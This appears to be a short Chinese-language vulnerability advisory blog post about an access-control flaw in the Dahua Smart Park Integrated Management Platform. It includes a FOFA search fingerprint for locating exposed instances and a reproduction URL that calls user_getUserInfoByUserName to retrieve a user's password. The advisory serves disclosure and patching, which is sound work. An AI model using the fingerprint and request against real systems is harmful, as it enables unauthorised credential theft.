免责声明:
本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。
产品简介
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞描述
大华智慧园区综合管理平台 user_getUserInfoByUserName 接口权限做限制,攻击者可以从接口获取任意用户密码
网络空间会测
Fofa
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
漏洞复现
https://127.0.0.1/admin/user_getUserInfoByUserName.action?userName=system
修复建议
1.升级到产品到最新版本
关注公众号,获取更多安全资讯:
1505
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
